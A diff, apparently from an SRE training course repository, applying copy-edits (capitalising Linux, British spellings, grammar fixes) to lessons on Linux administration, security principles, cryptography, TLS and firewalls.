users and everybody else. This is to make sure that one user is not
allowed to access the files and resources of another user.
@ -266,7 +266,7 @@ related to file permissions.
### Chmod command
The chmod command is used to modify files and directories permissions in
linux.
Linux.
The chmod command accepts permissions in as a numerical argument. We can
think of permission as a series of bits with 1 representing True or
@ -299,7 +299,7 @@ in the similar way.
### Chown command
The chown command is used to change the owner of files or
directories in linux.
directories in Linux.
Command syntax: chown \<new_owner\> \<file_name\>
@ -318,7 +318,7 @@ similar way.
### Chgrp command
The chgrp command can be used to change the group ownership of files or
directories in linux. The syntax is very similar to that of chown
directories in Linux. The syntax is very similar to that of chown
command.
![](images/linux/admin/image27.png)
@ -412,7 +412,7 @@ General syntax: scp \<source\> \<destination\>
## Package Management
Package management is the process of installing and managing software on
the system. We can install the packages which we require from the linux
the system. We can install the packages which we require from the Linux
package distributor. Different distributors use different packaging
systems.
@ -433,7 +433,7 @@ systems.
[DNF](https://docs.fedoraproject.org/en-US/quick-docs/dnf/) is
the successor to YUM which is now used in Fedora for installing and
managing packages. DNF may replace YUM in the future on all RPM based
linux distributions.
Linux distributions.
![](images/linux/admin/image20.png)
@ -450,7 +450,7 @@ httpd package.
## Process Management
In this section, we will study about some useful commands that can be
used to monitor the processes on linux systems.
used to monitor the processes on Linux systems.
### ps (process status)
@ -482,7 +482,7 @@ processes.
### top
The top command is used to show information about linux processes
The top command is used to show information about Linux processes
running on the system in real time. It also shows a summary of the
system information.
@ -521,7 +521,7 @@ additional information about io and cpu usage.
## Checking Disk Space
In this section, we will study about some useful commands that can be
used to view disk space on linux.
used to view disk space on Linux.
### df (disk free)
@ -581,7 +581,7 @@ used to start/stop/restart the services managed by systemd.
In this section, we will talk about some important files and directories
which can be very useful for viewing system logs and applications logs
in linux. These logs can be very useful when you are troubleshooting on
in Linux. These logs can be very useful when you are troubleshooting on
the system.
![](images/linux/admin/image58.png)

View File

@ -10,7 +10,7 @@
![The Wide Area of security](images/image1.png)
- SREs should be involved in both significant design discussions and actual system changes.
- They have quite a big role in System design & hence are quite sometimes the first line of defense.
- They have quite a big role in System design & hence are quite sometimes the first line of defence.
- SREs help in preventing bad design & implementations which can affect the overall security of the infrastructure.
- Successfully designing, implementing, and maintaining systems requires a commitment to **the full system lifecycle**. This commitment is possible only when security and reliability are central elements in the architecture of systems.
- Core Pillars of Information Security :
@ -26,17 +26,17 @@
- Security Principles By OWASP (Open Web Application Security Project)
- Minimize attack surface area :
- Every feature that is added to an application adds a certain amount of risk to the overall application. The aim for secure development is to reduce the overall risk by reducing the attack surface area.
- For example, a web application implements online help with a search function. The search function may be vulnerable to SQL injection attacks. If the help feature was limited to authorized users, the attack likelihood is reduced. If the help features search function was gated through centralized data validation routines, the ability to perform SQL injection is dramatically reduced. However, if the help feature was re-written to eliminate the search function (through better user interface, for example), this almost eliminates the attack surface area, even if the help feature was available to the Internet at large.
- Every feature that is added to an application adds a certain amount of risk to the overall application. The aim of secure development is to reduce the overall risk by reducing the attack surface area.
- For example, a web application implements online help with a search function. The search function may be vulnerable to SQL injection attacks. If the help feature was limited to authorized users, the attack likelihood is reduced. If the help features search function was gated through centralized data validation routines, the ability to perform SQL injection is dramatically reduced. However, if the help feature was re-written to eliminate the search function (through a better user interface, for example), this almost eliminates the attack surface area, even if the help feature was available to the Internet at large.
- Establish secure defaults:
- There are many ways to deliver an “out of the box” experience for users. However, by default, the experience should be secure, and it should be up to the user to reduce their security if they are allowed.
- For example, by default, password aging and complexity should be enabled. Users might be allowed to turn these two features off to simplify their use of the application and increase their risk.
- Default Passwords of routers, IOT devices should be changed
- For example, by default, password ageing and complexity should be enabled. Users might be allowed to turn these two features off to simplify their use of the application and increase their risk.
- Default Passwords of routers, IoT devices should be changed
- Principle of Least privilege
- The principle of least privilege recommends that accounts have the least amount of privilege required to perform their business processes. This encompasses user rights, resource permissions such as CPU limits, memory, network, and file system permissions.
- For example, if a middleware server only requires access to the network, read access to a database table, and the ability to write to a log, this describes all the permissions that should be granted. Under no circumstances should the middleware be granted administrative privileges.
- Principle of Defense in depth
- The principle of defense in depth suggests that where one control would be reasonable, more controls that approach risks in different fashions are better. Controls, when used in-depth, can make severe vulnerabilities extraordinarily difficult to exploit and thus unlikely to occur.
- The principle of defence in depth suggests that where one control would be reasonable, more controls that approach risks in different fashions are better. Controls, when used in depth, can make severe vulnerabilities extraordinarily difficult to exploit and thus unlikely to occur.
- With secure coding, this may take the form of tier-based validation, centralized auditing controls, and requiring users to be logged on all pages.
- For example, a flawed administrative interface is unlikely to be vulnerable to an anonymous attack if it correctly gates access to production management networks, checks for administrative user authorization, and logs all access.
- Fail securely
@ -58,26 +58,26 @@
- Dont trust services
- Many organizations utilize the processing capabilities of third-party partners, who more than likely have different security policies and posture than you. It is unlikely that you can influence or control any external third party, whether they are home users or major suppliers or partners.
- Therefore, the implicit trust of externally run systems is not warranted. All external systems should be treated in a similar fashion.
- For example, a loyalty program provider provides data that is used by Internet Banking, providing the number of reward points and a small list of potential redemption items. However, the data should be checked to ensure that it is safe to display to end-users, and that the reward points are a positive number, and not improbably large.
- Therefore, the implicit trust of externally run systems is not warranted. All external systems should be treated similarly.
- For example, a loyalty program provider provides data that is used by Internet Banking, providing the number of reward points and a small list of potential redemption items. However, the data should be checked to ensure that it is safe to display to end-users and that the reward points are a positive number, and not improbably large.
- Separation of duties
- The key to fraud control is the separation of duties. For example, someone who requests a computer cannot also sign for it, nor should they directly receive the computer. This prevents the user from requesting many computers and claiming they never arrived.
- Certain roles have different levels of trust than normal users. In particular, administrators are different from normal users. In general, administrators should not be users of the application.
- For example, an administrator should be able to turn the system on or off, set password policy but shouldnt be able to log on to the storefront as a super privileged user, such as being able to “buy” goods on behalf of other users.
- Avoid security by obscurity
- Security through obscurity is a weak security control, and nearly always fails when it is the only control. This is not to say that keeping secrets is a bad idea, it simply means that the security of systems should not be reliant upon keeping details hidden.
- For example, the security of an application should not rely upon knowledge of the source code being kept secret. The security should rely upon many other factors, including reasonable password policies, defense in depth, business transaction limits, solid network architecture, and fraud, and audit controls.
- For example, the security of an application should not rely upon knowledge of the source code being kept secret. The security should rely upon many other factors, including reasonable password policies, defence in depth, business transaction limits, solid network architecture, and fraud, and audit controls.
- A practical example is Linux. Linuxs source code is widely available, and yet when properly secured, Linux is a secure and robust operating system.
- Keep security simple
- Attack surface area and simplicity go hand in hand. Certain software engineering practices prefer overly complex approaches to what would otherwise be a relatively straightforward and simple design.
- Developers should avoid the use of double negatives and complex architectures when a simpler approach would be faster and simpler.
- For example, although it might be fashionable to have a slew of singleton entity beans running on a separate middleware server, it is more secure and faster to simply use global variables with an appropriate mutex mechanism to protect against race conditions.
- Fix security issues correctly
- Once a security issue has been identified, it is important to develop a test for it and to understand the root cause of the issue. When design patterns are used, it is likely that the security issue is widespread amongst all codebases, so developing the right fix without introducing regressions is essential.
- Once a security issue has been identified, it is important to develop a test for it and to understand the root cause of the issue. When design patterns are used, the security issue is likely widespread amongst all codebases, so developing the right fix without introducing regressions is essential.
- For example, a user has found that they can see another users balance by adjusting their cookie. The fix seems to be relatively straightforward, but as the cookie handling code is shared among all applications, a change to just one application will trickle through to all other applications. The fix must, therefore, be tested on all affected applications.
- Reliability & Security
- Reliability and security are both crucial components of a truly trustworthy system,but building systems that are both reliable and secure is difficult. While the requirements for reliability and security share many common properties, they also require different design considerations. It is easy to miss the subtle interplay between reliability and security that can cause unexpected outcomes
- Ex: A password management application failure was triggered by a reliability problem i.e poor load-balancing and load-shedding strategies and its recovery was later complicated by multiple measures (HSM mechanism which needs to be plugged into server racks , which works as an authentication & the HSM token supposedly locked inside a case.. & the problem can be further elongated ) designed to increase the security of the system.
- Reliability and security are both crucial components of a truly trustworthy system, but building systems that are both reliable and secure is difficult. While the requirements for reliability and security share many common properties, they also require different design considerations. It is easy to miss the subtle interplay between reliability and security that can cause unexpected outcomes
- Ex: A password management application failure was triggered by a reliability problem i.e poor load-balancing and load-shedding strategies and its recovery were later complicated by multiple measures (HSM mechanism which needs to be plugged into server racks, which works as an authentication & the HSM token supposedly locked inside a case.. & the problem can be further elongated ) designed to increase the security of the system.
---
@ -111,7 +111,7 @@
### Ciphers
- Ciphers are the cornerstone of cryptography. A cipher is a set of algorithms that performs encryption or decryption on a message. An encryption algorithm (E) takes a secret key (k) and a message (m), and produces a ciphertext (c). Similarly, a Decryption algorithm (D) takes a secret key (K) and the previous resulting Ciphertext (C). They are represented as follows:
- Ciphers are the cornerstone of cryptography. A cipher is a set of algorithms that performs encryption or decryption on a message. An encryption algorithm (E) takes a secret key (k) and a message (m) and produces a ciphertext (c). Similarly, a Decryption algorithm (D) takes a secret key (K) and the previous resulting Ciphertext (C). They are represented as follows:
```
@ -120,7 +120,7 @@ D(k,c) = m
```
- This also means that in order for it to be a cipher, it must satisfy the consistency equation as follows, making it possible to decrypt.
- This also means that for it to be a cipher, it must satisfy the consistency equation as follows, making it possible to decrypt.
```
@ -130,7 +130,7 @@ D(k,E(k,m)) = m
Stream Ciphers:
- The message is broken into characters or bits and enciphered with a key or keystream(should be random and generated independently of the message stream) that is as long as the plaintext bitstream.
- sIf the keystream is random, this scheme would be unbreakable unless the keystream was acquired, making it unconditionally secure. The keystream must be provided to both parties in a secure way to prevent its release.
- If the keystream is random, this scheme would be unbreakable unless the keystream was acquired, making it unconditionally secure. The keystream must be provided to both parties in a secure way to prevent its release.
Block Ciphers:
@ -182,15 +182,15 @@ Asymmetric Key Algorithm
Diffie-Hellman
- The protocol has two system parameters, p and g. They are both public and may be used by everybody. Parameter p is a prime number, and parameter g (usually called a generator) is an integer that is smaller than p, but with the following property: For every number n between 1 and p 1 inclusive, there is a power k of g such that n = gk mod p.
- Diffie Hellman algorithm is an asymmetric algorithm used to establish a shared secret for a symmetric key algorithm. Nowadays most of the people use hybrid cryptosystem i.e, combination of symmetric and asymmetric encryption. Asymmetric Encryption is used as a technique in key exchange mechanism to share secret key and after the key is shared between sender and receiver, the communication will take place using symmetric encryption. The shared secret key will be used to encrypt the communication.
- Diffie Hellman algorithm is an asymmetric algorithm used to establish a shared secret for a symmetric key algorithm. Nowadays most of the people use hybrid cryptosystem i.e, a combination of symmetric and asymmetric encryption. Asymmetric Encryption is used as a technique in key exchange mechanism to share a secret key and after the key is shared between sender and receiver, the communication will take place using symmetric encryption. The shared secret key will be used to encrypt the communication.
- Refer: <https://medium.com/@akhigbemmanuel/what-is-the-diffie-hellman-key-exchange-algorithm-84d60025a30d>
RSA
- The RSA algorithm is very flexible and has a variable key length where, if necessary, speed can be traded for the level of security of the algorithm. The RSA keys are usually 512 to 2048 bits long. RSA has withstood years of extensive cryptanalysis. Although those years neither proved nor disproved RSA's security, they attest to a confidence level in the algorithm. RSA security is based on the difficulty of factoring very large numbers. If an easy method of factoring these large numbers were discovered, the effectiveness of RSA would be destroyed.
- Refer : <https://medium.com/curiositypapers/a-complete-explanation-of-rsa-asymmetric-encryption-742c5971e0f>
- Refer: <https://medium.com/curiositypapers/a-complete-explanation-of-rsa-asymmetric-encryption-742c5971e0f>
**NOTE** : RSA Keys can be used for key exchange just like Deffie Hellman
**NOTE**: RSA Keys can be used for key exchange just like Diffie Hellman
Hashing Algorithms
@ -220,10 +220,10 @@ Digital Certificates
- Key management is often considered the most difficult task in designing and implementing cryptographic systems. Businesses can simplify some of the deployment and management issues that are encountered with secured data communications by employing a Public Key Infrastructure (PKI). Because corporations often move security-sensitive communications across the Internet, an effective mechanism must be implemented to protect sensitive information from the threats presented on the Internet.
- PKI provides a hierarchical framework for managing digital security attributes. Each PKI participant holds a digital certificate that has been issued by a CA (either public or private). The certificate contains a number of attributes that are used when parties negotiate a secure connection. These attributes must include the certificate validity period, end-host identity information, encryption keys that will be used for secure communications, and the signature of the issuing CA. Optional attributes may be included, depending on the requirements and capability of the PKI.
- PKI provides a hierarchical framework for managing digital security attributes. Each PKI participant holds a digital certificate that has been issued by a CA (either public or private). The certificate contains several attributes that are used when parties negotiate a secure connection. These attributes must include the certificate validity period, end-host identity information, encryption keys that will be used for secure communications, and the signature of the issuing CA. Optional attributes may be included, depending on the requirements and capability of the PKI.
- A CA can be a trusted third party, such as VeriSign or Entrust, or a private (in-house) CA that you establish within your organization.
- The fact that the message could be decrypted using the sender's public key means that the holder of the private key created the message. This process relies on the receiver having a copy of the sender's public key and knowing with a high degree of certainty that it really does belong to the sender and not to someone pretending to be the sender.
- To validate the CA's signature, the receiver must know the CA's public key. Normally, this is handled out-of-band or through an operation performed during installation of the certificate. For instance, most web browsers are configured with the root certificates of several CAs by default.
- To validate the CA's signature, the receiver must know the CA's public key. Normally, this is handled out-of-band or through an operation performed during the installation of the certificate. For instance, most web browsers are configured with the root certificates of several CAs by default.
CA Enrollment process
@ -257,21 +257,21 @@ The major features and guarantees of the SSH protocol are:
- Integrity of communications, guaranteeing they havent been altered
- Authentication, i.e., proof of identity of senders and receivers
- Authorization, i.e., access control to accounts
- Forwarding or tunneling to encrypt other TCP/IP-based sessions
- Forwarding or tunnelling to encrypt other TCP/IP-based sessions
### Kerberos
- According to Greek mythology Kerberos (Cerberus) was the gigantic, three-headed dog that guards the gates of the underworld to prevent the dead from leaving.
- So when it comes to Computer Science, Kerberos is a network authentication protocol, and is currently the default authentication technology used by Microsoft Active Directory to authenticate users to services within a local area network.
- So when it comes to Computer Science, Kerberos is a network authentication protocol and is currently the default authentication technology used by Microsoft Active Directory to authenticate users to services within a local area network.
- Kerberos uses symmetric key cryptography and requires trusted third-party authentication service to verify user identities. So they used the name of Kerberos for their computer network authentication protocol as the three heads of the Kerberos represent:
- a client : A user/ a service
- a server : Kerberos protected hosts reside
- Kerberos uses symmetric-key cryptography and requires a trusted third-party authentication service to verify user identities. So they used the name of Kerberos for their computer network authentication protocol as the three heads of the Kerberos represent:
- a client: A user/ a service
- a server: Kerberos protected hosts reside
![image10](images/image10.png)
- a Key Distribution Center (KDC), which acts as the trusted third-party authentication service.
The KDC includes following two servers:
The KDC includes the following two servers:
- Authentication Server (AS) that performs the initial authentication and issues ticket-granting tickets (TGT) for users.
- Ticket-Granting Server (TGS) that issues service tickets that are based on the initial ticket-granting tickets (TGT).
@ -303,7 +303,7 @@ Certificate chain
- The issuer line indicates its issued by Google Internet Authority G2, which also happens to be the subject of the second certificate, number 1
- What the OpenSSL command line doesnt show here is the trust store that contains the list of CA certificates trusted by the system OpenSSL runs on.
- The public certificate of GlobalSign Authority must be present in the systems trust store to close the verification chain. This is called a chain of trust, and figure below summarizes its behavior at a high level.
- The public certificate of GlobalSign Authority must be present in the systems trust store to close the verification chain. This is called a chain of trust, and the figure below summarizes its behaviour at a high level.
![image122](images/image122.png)
@ -313,7 +313,7 @@ Certificate chain
1. The client sends a HELLO message to the server with a list of protocols and algorithms it supports.
2. The server says HELLO back and sends its chain of certificates. Based on the capabilities of the client, the server picks a cipher suite.
3. If the cipher suite supports ephemeral key exchange, like ECDHE does(ECDHE is an algorithm known as the Elliptic Curve Diffie-Hellman Exchange), the server and the client negotiate a pre master key with the Diffie-Hellman algorithm. The pre master key is never sent over the wire.
3. If the cipher suite supports ephemeral key exchange, like ECDHE does(ECDHE is an algorithm known as the Elliptic Curve Diffie-Hellman Exchange), the server and the client negotiate a pre-master key with the Diffie-Hellman algorithm. The pre-master key is never sent over the wire.
4. The client and server create a session key that will be used to encrypt the data transiting through the connection.
At the end of the handshake, both parties possess a secret session key used to encrypt data for the rest of the connection. This is what OpenSSL refers to as Master-Key
@ -322,12 +322,12 @@ At the end of the handshake, both parties possess a secret session key used to e
- There are 3 versions of TLS , TLS 1.0, 1.1 & 1.2
- TLS 1.0 was released in 1999, making it a nearly two-decade-old protocol. It has been known to be vulnerable to attacks—such as BEAST and POODLE—for years, in addition to supporting weak cryptography, which doesnt keep modern-day connections sufficiently secure.
- TLS 1.1 is the forgotten “middle child.” It also has bad cryptography like its younger sibling. In most software it was leapfrogged by TLS 1.2 and its rare to see TLS 1.1 used.
- TLS 1.1 is the forgotten “middle child.” It also has bad cryptography like its younger sibling. In most software, it was leapfrogged by TLS 1.2 and its rare to see TLS 1.1 used.
### “Perfect” Forward Secrecy
- The term “ephemeral” in the key exchange provides an important security feature mis-named perfect forward secrecy (PFS) or just “Forward Secrecy”.
- In a non-ephemeral key exchange, the client sends the pre-master key to the server by encrypting it with the servers public key. The server then decrypts the pre-master key with its private key. If, at a later point in time, the private key of the server is compromised, an attacker can go back to this handshake, decrypt the pre-master key, obtain the session key, and decrypt the entire traffic. Non-ephemeral key exchanges are vulnerable to attacks that may happen in the future on recorded traffic. And because people seldom change their password, decrypting data from the past may still be valuable for an attacker.
- In a non-ephemeral key exchange, the client sends the pre-master key to the server by encrypting it with the servers public key. The server then decrypts the pre-master key with its private key. If at a later point in time, the private key of the server is compromised, an attacker can go back to this handshake, decrypt the pre-master key, obtain the session key, and decrypt the entire traffic. Non-ephemeral key exchanges are vulnerable to attacks that may happen in the future on recorded traffic. And because people seldom change their password, decrypting data from the past may still be valuable for an attacker.
- An ephemeral key exchange like DHE, or its variant on elliptic curve, ECDHE, solves this problem by not transmitting the pre-master key over the wire. Instead, the pre-master key is computed by both the client and the server in isolation, using nonsensitive information exchanged publicly. Because the pre-master key cant be decrypted later by an attacker, the session key is safe from future attacks: hence, the term perfect forward secrecy.
- Keys are changed every X blocks along the stream. That prevents an attacker from simply sniffing the stream and applying brute force to crack the whole thing. "Forward secrecy" means that just because I can decrypt block M, does not mean that I can decrypt block Q
- Downside:

Binary file not shown.

Before

Width:  |  Height:  |  Size: 150 KiB

After

Width:  |  Height:  |  Size: 236 KiB

View File

@ -9,7 +9,7 @@
## What to expect from this course
The course covers fundamentals of information security along with touching on subjects of system security, network & web security. The aim of this course is to get familiar with the basics of information security in day to day operations & then as an SRE develop the mindset of ensuring that security takes a front-seat while developing solutions. The course also serves as an introduction to common risks and best practices along with practical ways to find out vulnerable systems and loopholes which might become compromised if not secured.
The course covers fundamentals of information security along with touching on subjects of system security, network & web security. This course aims to get you familiar with the basics of information security in day to day operations & then as an SRE develop the mindset of ensuring that security takes a front-seat while developing solutions. The course also serves as an introduction to common risks and best practices along with practical ways to find out vulnerable systems and loopholes which might become compromised if not secured.
## What is not covered under this course

View File

@ -1,9 +1,9 @@
# Part II : Network Security
# Part II: Network Security
## Introduction
- TCP/IP is the dominant networking technology today. It is a five-layer architecture. These layers are, from top to bottom, the application layer, the transport layer (TCP), the network layer (IP), the data-link layer, and the physical layer. In addition to TCP/IP, there also are other networking technologies. For convenience, we use the OSI network model to represent non-TCP/IP network technologies. Different networks are interconnected using gateways. A gateway can be placed at any layer.
- The OSI model is a seven-layer architecture. The OSI architecture is similar to the TCP/IP architecture, except that the OSI model specifies two additional layers between the application layer and the transport layer in the TCP/IP architecture. These two layers are the presentation layer and the session layer. Figure 5.1 shows the relation between the TCP/IP layers and the OSI layers. The application layer in TCP/IP corresponds to the application layer and the presentation layer in OSI. The transport layer in TCP/IP corresponds to the session layer and the transport layer in OSI. The remaining three layers in the TCP/IP architecture are one-to-one correspondent to the remaining three layers in the OSI model.
- The OSI model is a seven-layer architecture. The OSI architecture is similar to the TCP/IP architecture, except that the OSI model specifies two additional layers between the application layer and the transport layer in the TCP/IP architecture. These two layers are the presentation layer and the session layer. Figure 5.1 shows the relationship between the TCP/IP layers and the OSI layers. The application layer in TCP/IP corresponds to the application layer and the presentation layer in OSI. The transport layer in TCP/IP corresponds to the session layer and the transport layer in OSI. The remaining three layers in the TCP/IP architecture are one-to-one correspondent to the remaining three layers in the OSI model.
![image14](images/image14.png)
Correspondence between layers of the TCP/IP architecture and the OSI model. Also shown are placements of cryptographic algorithms in network layers, where the dotted arrows indicate actual communications of cryptographic algorithms
@ -19,7 +19,7 @@ The functionalities of OSI layers are briefly described as follows:
7. The physical layer is responsible for transmitting device-dependent frames through some physical media.
- Starting from the application layer, data generated from an application program is passed down layer-by-layer to the physical layer. Data from the previous layer is enclosed in a new envelope at the current layer, where the data from the previous layer is also just an envelope containing the data from the layer before it. This is similar to enclosing a smaller envelope in a larger one. The envelope added at each layer contains sufficient information for handling the packet. Application-layer data are divided into blocks small enough to be encapsulated in an envelope at the next layer.
- Application data blocks are “dressed up” in the TCP/IP architecture according to the following basic steps. At the sending side, an application data block is encapsulated in a TCP packet when it is passed down to the TCP layer. In other words, a TCP packet consists of a header and a payload, where the header corresponds to the TCP envelope and the payload is the application data block. Likewise, the TCP packet will be encapsulated in an IP packet when it is passed down to the IP layer. An IP packet consists of a header and a payload, which is the TCP packet passed down from the TCP layer. The IP packet will be encapsulated in a device-dependent frame (e.g., an Ethernet frame) when it is passed down to the data-link layer. A frame has a header, and it may also have a trailer. For example, in addition to having a header, an Ethernet frame also has a 32-bit cyclic redundancy check (CRC) trailer. When it is passed down to the physical layer, a frame will be transformed to a sequence of media signals for transmission
- Application data blocks are “dressed up” in the TCP/IP architecture according to the following basic steps. At the sending side, an application data block is encapsulated in a TCP packet when it is passed down to the TCP layer. In other words, a TCP packet consists of a header and a payload, where the header corresponds to the TCP envelope and the payload is the application data block. Likewise, the TCP packet will be encapsulated in an IP packet when it is passed down to the IP layer. An IP packet consists of a header and a payload, which is the TCP packet passed down from the TCP layer. The IP packet will be encapsulated in a device-dependent frame (e.g., an Ethernet frame) when it is passed down to the data-link layer. A frame has a header, and it may also have a trailer. For example, in addition to having a header, an Ethernet frame also has a 32-bit cyclic redundancy check (CRC) trailer. When it is passed down to the physical layer, a frame will be transformed into a sequence of media signals for transmission
![image15](images/image15.png)
Flow Diagram of a Packet Generation
@ -28,7 +28,7 @@ The functionalities of OSI layers are briefly described as follows:
### Public Key Infrastructure
- To deploy cryptographic algorithms in network applications, we need a way to distribute secret keys using open networks. Public-key cryptography is the best way to distribute these secret keys. In order to use public-key cryptography, we need to build a public-key infrastructure (PKI) to support and manage public-key certificates and certificate authority (CA) networks. In particular, PKIs are set up to perform the following functions:
- To deploy cryptographic algorithms in network applications, we need a way to distribute secret keys using open networks. Public-key cryptography is the best way to distribute these secret keys. To use public-key cryptography, we need to build a public-key infrastructure (PKI) to support and manage public-key certificates and certificate authority (CA) networks. In particular, PKIs are set up to perform the following functions:
- Determine the legitimacy of users before issuing public-key certificates to them.
- Issue public-key certificates upon user requests.
- Extend public-key certificates valid time upon user requests.
@ -47,8 +47,8 @@ The functionalities of OSI layers are briefly described as follows:
### PGP & S/MIME : Email Security
- There are a number of security protocols at the application layer. The most used of these protocols are email security protocols namely PGP and S/MIME.
- SMTP (“Simple Mail Transfer Protocol”) is used for sending and delivering from a client to a server via port 25: its the outgoing server. On the contrary, POP (“Post Office Protocol”) allows the user to pick up the message and download it into his own inbox: its the incoming server. The latest version of the Post Office Protocol is named POP3, and its been used since 1996; it uses port 110
- There are several security protocols at the application layer. The most used of these protocols are email security protocols namely PGP and S/MIME.
- SMTP (“Simple Mail Transfer Protocol”) is used for sending and delivering from a client to a server via port 25: its the outgoing server. On the contrary, POP (“Post Office Protocol”) allows the user to pick up the message and download it into his inbox: its the incoming server. The latest version of the Post Office Protocol is named POP3, and its been used since 1996; it uses port 110
PGP
@ -61,11 +61,11 @@ GPG (GnuPG)
- GnuPG is another free encryption standard that companies may use that is based on OpenPGP.
- GnuPG serves as a replacement for Symantecs PGP.
- The main difference is the supported algorithms. However, GnuPG plays nice with PGP by design. Because GnuPG is open, some businesses would prefer the technical support and the user interface that comes with Symantecs PGP.
- It is important to note that there are some nuances between compatibility of GnuPG and PGP, such as the compatibility between certain algorithms, but in most applications such as email, there are workarounds. One such algorithm is the IDEA Module which isnt included in GnuPG out of the box due to patent issues.
- It is important to note that there are some nuances between the compatibility of GnuPG and PGP, such as the compatibility between certain algorithms, but in most applications such as email, there are workarounds. One such algorithm is the IDEA Module which isnt included in GnuPG out of the box due to patent issues.
S/MIME
- SMTP can only handle 7-bit ASCII text (You can use UTF-8 extensions to alleviate this limitations, ) messages. While POP can handle other content types besides 7-bit ASCII, POP may, under a common default setting, download all the messages stored in the mail server to the user's local computer. After that, if POP removes these messages from the mail server. This makes it difficult for the user to read his messages from multiple computers.
- SMTP can only handle 7-bit ASCII text (You can use UTF-8 extensions to alleviate these limitations, ) messages. While POP can handle other content types besides 7-bit ASCII, POP may, under a common default setting, download all the messages stored in the mail server to the user's local computer. After that, if POP removes these messages from the mail server. This makes it difficult for the user to read his messages from multiple computers.
- The Multipurpose Internet Mail Extension protocol (MIME) was designed to support sending and receiving email messages in various formats, including nontext files generated by word processors, graphics files, sound files, and video clips. Moreover, MIME allows a single message to include mixed types of data in any combination of these formats.
- The Internet Mail Access Protocol (IMAP), operated on TCP port 143(only for non-encrypted), stores (Configurable on both server & client just like PoP) incoming email messages in the mail server until the user deletes them deliberately. This allows the user to access his mailbox from multiple machines and download messages to a local machine without deleting it from the mailbox in the mail server.
@ -74,8 +74,8 @@ SSL/TLS
- SSL uses a PKI to decide if a servers public key is trustworthy by requiring servers to use a security certificate signed by a trusted CA.
- When Netscape Navigator 1.0 was released, it trusted a single CA operated by the RSA Data Security corporation.
- The servers public RSA keys were used to be stored in the security certificate, which can then be used by the browser to establish a secure communication channel. The security certificates we use today still rely on the same standard (named X.509) that Netscape Navigator 1.0 used back then.
- Netscapes intent was to train users(though this didnt work out later) to differentiate secure communications from insecure ones, so they put a lock icon next to the address bar. When the lock is open, the communication is insecure. A closed lock means communication has been secured with SSL, which required the server to provide a signed certificate. Youre obviously familiar with this icon as its been in every browser ever since. The engineers at Netscape truly created a standard for secure internet communications.
- A year after releasing SSL 2.0, Netscape fixed several security issues and released SSL 3.0, a protocol that, albeit being officially deprecated since June 2015, remains in use in certain parts of the world more than 20 years after its introduction. In an effort to standardize SSL, the Internet Engineering Task Force (IETF) created a slightly modified SSL 3.0 and, in 1999, unveiled it as Transport Layer Security (TLS) 1.0. The name change between SSL and TLS continues to confuse people today. Officially, TLS is the new SSL, but in practice, people use SSL and TLS interchangeably to talk about any version of the protocol.
- Netscape intended to train users(though this didnt work out later) to differentiate secure communications from insecure ones, so they put a lock icon next to the address bar. When the lock is open, the communication is insecure. A closed lock means communication has been secured with SSL, which required the server to provide a signed certificate. Youre obviously familiar with this icon as its been in every browser ever since. The engineers at Netscape truly created a standard for secure internet communications.
- A year after releasing SSL 2.0, Netscape fixed several security issues and released SSL 3.0, a protocol that, albeit being officially deprecated since June 2015, remains in use in certain parts of the world more than 20 years after its introduction. To standardize SSL, the Internet Engineering Task Force (IETF) created a slightly modified SSL 3.0 and, in 1999, unveiled it as Transport Layer Security (TLS) 1.0. The name change between SSL and TLS continues to confuse people today. Officially, TLS is the new SSL, but in practice, people use SSL and TLS interchangeably to talk about any version of the protocol.
- Must See:
- <https://tls.ulfheim.net/>
@ -91,13 +91,13 @@ Let us see how we keep a check on the perimeter i.e the edges, the first layer o
- This is because IP packets, regardless of whether they are encrypted, can always be forwarded into an edge network.
- Firewalls that were developed in the 1990s are important instruments to help restrict network access. A firewall may be a hardware device, a software package, or a combination of both.
- Packets flowing into the internal network from the outside should be evaluated before they are allowed to enter. One of the critical elements of a firewall is its ability to examine packets without imposing a negative impact on communication speed while providing security protections for the internal network.
- The packet inspection that is carried out by firewalls can be done using several different methods. On the basis of the particular method used by the firewall, it can be characterized as either a packet filter, circuit gateway, application gateway, or dynamic packet filter.
- The packet inspection that is carried out by firewalls can be done using several different methods. Based on the particular method used by the firewall, it can be characterized as either a packet filter, circuit gateway, application gateway, or dynamic packet filter.
### Packet Filters
- It inspects ingress packets coming to an internal network from outside and inspects egress packets going outside from an internal network
- Packing filtering only inspects IP headers and TCP headers, not the payloads generated at the application layer
- A packet filtering firewall uses a set of rules to determine whether a packet should be allowed or denied to pass through.
- A packet-filtering firewall uses a set of rules to determine whether a packet should be allowed or denied to pass through.
- 2 types:
- Stateless
- It treats each packet as an independent object, and it does not keep track of any previously processed packets. In other words, stateless filtering inspects a packet when it arrives and makes a decision without leaving any record of the packet being inspected.
@ -114,21 +114,21 @@ Let us see how we keep a check on the perimeter i.e the edges, the first layer o
### Application Gateways(ALG)
- Aka PROXY Servers
- An Application Level Gateway (ALG) acts like a proxy for internal hosts, processing service requests from external clients.
- An Application Level Gateway (ALG) acts as a proxy for internal hosts, processing service requests from external clients.
- An ALG performs deep inspections on each IP packet (ingress or egress).
- In particular, an ALG inspects application program formats contained in the packet (e.g., MIME format or SQL format) and examines whether its payload is permitted.
- Thus, an ALG may be able to detect a computer virus contained in the payload. Because an ALG inspects packet payloads, it may be able to detect malicious code and quarantine suspicious packets, in addition to blocking packets with suspicious IP addresses and TCP ports. On the other hand, an ALG also incurs substantial computation and space overheads.
### Trusted Systems & Bastion Hosts
- A Trusted Operating System (TOS) is an operating system that meets a particular set of security requirements. Whether an operating system can be trusted or not depends on a number of elements. For example, for an operating system on a particular computer to be certified trusted, one needs to validate that, among other things, the following four requirements are satisfied:
- A Trusted Operating System (TOS) is an operating system that meets a particular set of security requirements. Whether an operating system can be trusted or not depends on several elements. For example, for an operating system on a particular computer to be certified trusted, one needs to validate that, among other things, the following four requirements are satisfied:
- Its system design contains no defects;
- Its system software contains no loopholes;
- Its system is configured properly; and
- Its system management is appropriate.
- Bastion Hosts
- Bastion hosts are computers with strong defense mechanisms. They often serve as host computers for implementing application gateways, circuit gateways, and other types of firewalls. A bastion host is operated on a trusted operating system that must not contain unnecessary functionalities or programs. This measure helps to reduce error probabilities and makes it easier to conduct security checks. Only those network application programs that are absolutely necessary, for example, SSH, DNS, SMTP, and authentication programs, are installed on a bastion host.
